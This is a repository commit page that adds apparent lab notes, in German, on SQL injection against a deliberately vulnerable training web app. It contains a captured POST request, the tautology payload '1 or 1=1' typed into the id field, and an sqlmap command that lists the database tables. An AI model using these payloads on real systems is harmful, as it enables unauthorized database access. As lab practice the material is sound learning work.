Commit cad62e0e authored by David's avatar David
Browse files

added middle/SQL Injection

parent a4282eb7
POST /vulnerabilities/sqli/ HTTP/1.1
Host: 172.16.11.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.11.1/vulnerabilities/sqli/
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
DNT: 1
Connection: close
Cookie: PHPSESSID=8mdd3q0vij1b3kuujt4vd8qca6; security=medium
Upgrade-Insecure-Requests: 1
id=1&Submit=Submit
\ No newline at end of file
# Normal
Eingabe: `1`
# Hack mit HTTP-Proxy:
Manipulation des ID-Felds zu: `1 or 1=1`
# Hack mit SQL-Map:
Speichere den Post-Request in eine Text-Datei und speise diese in SQLMap ein:
`sqlmap.py --tables -r [Post Datei]`
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment